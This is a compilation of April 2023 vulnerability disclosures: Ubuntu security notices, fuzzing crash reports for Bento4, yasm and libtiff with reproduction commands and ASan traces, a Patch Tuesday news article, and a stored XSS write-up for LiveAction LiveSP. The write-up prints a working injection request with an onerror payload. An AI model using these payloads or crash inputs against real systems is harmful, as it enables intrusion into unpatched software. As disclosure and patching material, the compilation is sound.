Ubuntu Security Notice 6009-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6009-1  
April 11, 2023

linux-gcp vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.15.0-1147-gcp     4.15.0-1147.163~16.04.1  
   linux-image-gcp                 4.15.0.1147.137  
   linux-image-gke                 4.15.0.1147.137

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6009-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-28328

Ubuntu Security Notice USN-6009-1

TightVNC before v2.8.75 allows attackers to escalate privileges on the host operating system via replacing legitimate files with crafted files when executing a file transfer. This is due to the fact that TightVNC runs in the backend as a high-privileges account.

CVE-2023-27830: TightVNC: What's New in TightVNC

Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42avc component.

**Summary**

Hello, I found out-of-memory bug in mp42avc

**BUG**

out-of-memory (/home/ubuntu/fuzz/asan\_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long)

**Build**

ubuntu 20.04

    export CC=clang
    export CXX=clang++
    export CFLAGS="-fsanitize=address -g"
    export CXXFLAGS="-fsanitize=address -g"
    mkdir build
    cd build
    cmake -DCMAKE_BUILD_TYPE=Release ..
    make
    

    ./mp42avc poc3.mp4 /dev/null
    
    =================================================================
    ==1349287==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x400000010 bytes
        #0 0x4c44dd in operator new(unsigned long) (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd)
        #1 0x6063ae in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:172:25
        #2 0x6063ae in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:210:25
        #3 0x6063ae in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:150:9
        #4 0x605ca2 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16
        #5 0x53af9d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20
        #6 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
        #7 0x57804b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
        #8 0x57729e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
        #9 0x57729e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
        #10 0x53b79c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
        #11 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
        #12 0x57804b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
        #13 0x57729e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
        #14 0x57729e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
        #15 0x53b79c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
        #16 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
        #17 0x5397cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
        #18 0x4cfebe in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:104:12
        #19 0x4d03ca in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:78:5
        #20 0x4c7064 in main /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Apps/Mp42Avc/Mp42Avc.cpp:307:32
        #21 0x7f877ffc1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
    
    ==1349287==HINT: if you don't care about these errors you may set allocator_may_return_null=1
    SUMMARY: AddressSanitizer: out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long)
    ==1349287==ABORTING
    

**poc**

https://github.com/z1r00/fuzz\_vuln/blob/main/Bento4/mp42avc/poc3.zip

CVE-2023-29574: out-of-memory in mp42avc · Issue #841 · axiomatic-systems/Bento4

yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

z1r00 opened this issue

Mar 31, 2023

· 0 comments

Open

**SEGV yasm/libyasm/expr.c:87:44 in yasm\_expr\_create #215**

z1r00 opened this issue

Mar 31, 2023

· 0 comments

**Comments**

**SEGV yasm/libyasm/expr.c:87:44 in yasm\_expr\_create****project address**

https://github.com/yasm/yasm

**info**

OS：Ubuntu20.04 TLS

Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install

**Poc**

https://github.com/z1r00/fuzz\_vuln/blob/main/yasm/segv/yasm\_expr\_create/id:000051%2Csig:06%2Csrc:008025%2Cop:havoc%2Crep:32

**ASAN Info**

./yasm id:000051,sig:06,src:008025,op:havoc,rep:32

yasm: file name already has no extension: output will be in \`yasm.out'
AddressSanitizer:DEADLYSIGNAL
\=================================================================
\==3310123==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000060db46 bp 0x7ffd285ed390 sp 0x7ffd285ed320 T0)
\==3310123==The signal is caused by a READ memory access.
\==3310123==Hint: address points to the zero page.
    #0 0x60db46 in yasm\_expr\_create /home/z1r0/fuzzing/yasm/yasm/libyasm/expr.c:87:44
    #1 0x57c34f in nasm\_parser\_directive /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1597:17
    #2 0x579361 in parse\_line /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:377:17
    #3 0x579361 in nasm\_parser\_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:231:18
    #4 0x577618 in nasm\_do\_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:66:5
    #5 0x577618 in nasm\_parser\_do\_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:83:5
    #6 0x4c6eae in do\_assemble /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:521:5
    #7 0x4c6eae in main /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:753:12
    #8 0x7f764ee43082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #9 0x41c47d in \_start (/home/z1r0/fuzzing/yasm/yasm/yasm+0x41c47d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/z1r0/fuzzing/yasm/yasm/libyasm/expr.c:87:44 in yasm\_expr\_create
\==3310123==ABORTING

1 participant

CVE-2023-29580: SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create · Issue #215 · yasm/yasm

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.
Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20

Patch Tuesday / Software Updates

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.

Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20 elevation of privilege vulnerabilities. The updates also follow fixes for 26 vulnerabilities in its Edge browser that were released over the past month.

The security flaw that's come under active exploitation is CVE-2023-28252 (CVSS score: 7.8), a privilege escalation bug in the Windows Common Log File System (CLFS) Driver.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory, crediting researchers Boris Larin, Genwei Jiang, and Quan Jin for reporting the issue.

CVE-2023-28252 is the fourth privilege escalation flaw in the CLFS component that has come under active abuse in the past year alone after CVE-2022-24521, CVE-2022-37969, and CVE-2023-23376 (CVSS scores: 7.8). At least 32 vulnerabilities have been identified in CLFS since 2018.

According to Russian cybersecurity firm Kaspersky, the vulnerability has been weaponized by a cybercrime group to deploy Nokoyawa ransomware against small and medium-sized businesses in the Middle East, North America, and Asia.

"CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend the metadata block," Larin said. "The vulnerability gets triggered by the manipulation of the base log file."

In light of ongoing exploitation of the flaw, CISA added the Windows zero-day to its catalog of Known Exploited Vulnerabilities (KEV), ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by May 2, 2023.

Also patched are critical remote code execution flaws impacting DHCP Server Service, Layer 2 Tunneling Protocol, Raw Image Extension, Windows Point-to-Point Tunneling Protocol, Windows Pragmatic General Multicast, and Microsoft Message Queuing (MSMQ).

The MSMQ bug, tracked as CVE-2023-21554 (CVSS score: 9.8) and dubbed QueueJumper by Check Point, could lead to unauthorized code execution and take over a server by sending a specially crafted malicious MSMQ packet to an MSMQ server.

"The CVE-2023-21554 vulnerability allows an attacker to potentially execute code remotely and without authorization by reaching the TCP port 1801," Check Point researcher Haifei Li said. "In other words, an attacker could gain control of the process through just one packet to the 1801/tcp port with the exploit, triggering the vulnerability."

Two other flaws discovered in MSMQ, CVE-2023-21769 and CVE-2023-28302 (CVSS scores: 7.5), could be exploited to cause a denial-of-service (DoS) condition such as a service crash and Windows Blue Screen of Death (BSoD).

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

Microsoft has also updated its advisory for CVE-2013-3900, a WinVerifyTrust signature validation vulnerability, to include the following Server Core installation versions -

*   Windows Server 2008 for 32-bit Systems Service Pack 2
*   Windows Server 2008 for x65-based Systems Service Pack 2
*   Windows Server 2008 R2 for x64-based Systems Service 1
*   Windows Server 2012
*   Windows Server 2012 R2
*   Windows Server 2016
*   Windows Server 2019, and
*   Windows Server 2022

The development comes as North Korea-linked threat actors have been observed leveraging the flaw to incorporate encrypted shellcode into legitimate libraries without invalidating the Microsoft-issued signature.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors in the last few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple
*   Arm
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samba
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SonicWall, and
*   Sophos

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Urgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit

Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_TrunAtom::SetDataOffset(int) function in Ap4TrunAtom.h.

**Summary**

Hello, I found SEGV bug in Ap4TrunAtom.h

**BUG**

SEGV /home/ubuntu/fuzz/asan\_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4\_TrunAtom::SetDataOffset(int)

**Build**

ubuntu 20.04

    export CC=clang
    export CXX=clang++
    export CFLAGS="-fsanitize=address -g"
    export CXXFLAGS="-fsanitize=address -g"
    mkdir build
    cd build
    cmake -DCMAKE_BUILD_TYPE=Release ..
    make
    

    ./mp42aac poc4.mp4 /dev/null
    
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1110587==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x000000562a98 bp 0x7ffdb6c29220 sp 0x7ffdb6c28e80 T0)
    ==1110587==The signal is caused by a WRITE memory access.
    ==1110587==Hint: address points to the zero page.
        #0 0x562a98 in AP4_TrunAtom::SetDataOffset(int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80
        #1 0x562a98 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Processor.cpp:285:19
        #2 0x567c4f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Processor.cpp:721:18
        #3 0x4c7b98 in main /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Apps/Mp4Decrypt/Mp4Decrypt.cpp:258:29
        #4 0x7ff6f6ed9082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #5 0x41c63d in _start (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp4decrypt+0x41c63d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int)
    ==1110587==ABORTING
    
    

**poc**

https://github.com/z1r00/fuzz\_vuln/blob/main/Bento4/mp4decrypt/sigv/poc5.zip

CVE-2023-29576: SEGV Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int) · Issue #844 · axiomatic-systems/Bento4

A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds read in the extractImageSection function in tools/tiffcrop.c, resulting in a denial of service and limited information disclosure. This issue affects libtiff versions 4.x.

Skip to content

Open Issue created Mar 18, 2023 by **xiaoxiaoafeifei@xiaoxiaoafeifei**Contributor

**tiffcrop: heap-buffer-overflow in file tiffcrop.c, line 7874**

Summary I found heap-buffer-overflow in file tiffcrop.c, line 7874

    ASAN:
    ==3365046==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000000583 at pc 0x000000507b20 bp 0x7ffdca4c66a0 sp 0x7ffdca4c6698
    READ of size 1 at 0x616000000583 thread T0
        #0 0x507b1f in extractImageSection /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:7874:33
        #1 0x4e8f7c in writeImageSections /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:8124:13
        #2 0x4cee30 in main /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:2868:21
        #3 0x7fc2381e2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #4 0x41d6ad in _start (/usr/local/bin/tiffcrop+0x41d6ad)
    
    0x616000000583 is located 0 bytes to the right of 515-byte region [0x616000000380,0x616000000583)
    allocated by thread T0 here:
        #0 0x495ded in malloc (/usr/local/bin/tiffcrop+0x495ded)
        #1 0x5f0086 in _TIFFmalloc /root/gitlab/commit/libtiff_test/libtiff/tif_unix.c:326:13
        #2 0x4ed440 in limitMalloc /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:709:12
        #3 0x4d4b50 in loadImage /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:7113:26
        #4 0x4ce28d in main /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:2782:17
        #5 0x7fc2381e2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/gitlab/commit/libtiff_test/tools/tiffcrop.c:7874:33 in extractImageSection
    Shadow bytes around the buggy address:
      0x0c2c7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2c7fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2c7fff80b0:[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2c7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2c7fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3365046==ABORTING

Version: LIBTIFF, Version 4.5

Steps to reproduce

    CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-g -O0 -fsanitize=address,leak -fno-omit-frame-pointer" CXXFLAGS="-g -O0 -fsanitize=address,leak -fno-omit-frame-pointer" ./configure  --disable-shared
    make & make install
    /usr/local/bin/tiffcrop -R 270  -S 8:4 -O landscape -E b -e divided -F hor -w 10 -U cm -m 1,2,3,4 -i poc /tmp/foo

Platform ubuntu20, x86

POC: poc0

Edited Mar 18, 2023 by xiaoxiaoafeifei

CVE-2023-1916: tiffcrop: heap-buffer-overflow in file tiffcrop.c, line 7874 (#537) · Issues · libtiff / libtiff · GitLab

A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.

**CVE-2023-24721 - Stored Cross-site Scripting (XSS)**

  

**Description**

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

**POC**

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

**Affected Endpoint**

*   **URL:** https://\[ip:port\]/va/service/bach/topology/element
*   **HTTP Post Parameter:** name

**Technical Details**

In this specific instance, using the API available under _/va/service/bach/topology/element_, it is possible to inject arbitrary JavaScript code within the _name_ POST parameter, as shown in the following HTTP Request/Response pair.

**HTTP Request:**

POST /va/service/bach/topology/element HTTP/1.1
Host: \[REDACTED\]
Cookie: \[REDACTED\]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: \[REDACTED\]
X-Customer: \[REDACTED\]
Content-Type: application/json
Content-Length: 175
Origin: \[REDACTED\]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\\"\><img src\='x' onerror\='alert(\\"pwned\\")'\>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":\[\]}}

**HTTP Response:**

HTTP/1.1 201 Created
Server: \[REDACTED\]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: \*
Referrer-Policy: strict-origin

\[...\]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the _https://\[hostname:port\]/va/cluster_ web page, the exploit runs from the victim’s browser.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721

CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

Ubuntu Security Notice 6002-1 - It was discovered that Irssi incorrectly handled certain internal routines. An attacker could possibly use this issue to cause a crash.

    ==========================================================================Ubuntu Security Notice USN-6002-1April 10, 2023irssi vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Irssi could be made to crash in specific scenarios.Software Description:- irssi: terminal based IRC clientDetails:It was discovered that Irssi incorrectly handled certain internal routines.An attacker could possibly use this issue to cause a crash.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  irssi                           1.4.2-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6002-1  CVE-2023-29132Package Information:  https://launchpad.net/ubuntu/+source/irssi/1.4.2-1ubuntu1.1

Ubuntu Security Notice USN-6002-1

Ubuntu Security Notice 6003-1 - Xi Lu discovered that Emacs did not properly handle certain inputs. An attacker could possibly use this issue to execute arbitrary commands.

    ==========================================================================Ubuntu Security Notice USN-6003-1April 06, 2023emacs24 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Emacs could be made to run programs as your login if it received specially crafted input.Software Description:- emacs24: GNU Emacs editorDetails:Xi Lu discovered that Emacs did not properly handle certaininputs. An attacker could possibly use this issue to executearbitrary commands.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   emacs24                                 24.5+1-6ubuntu1.1+esm3   emacs24-common                  24.5+1-6ubuntu1.1+esm3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6003-1   CVE-2023-28617

Tag

#ubuntu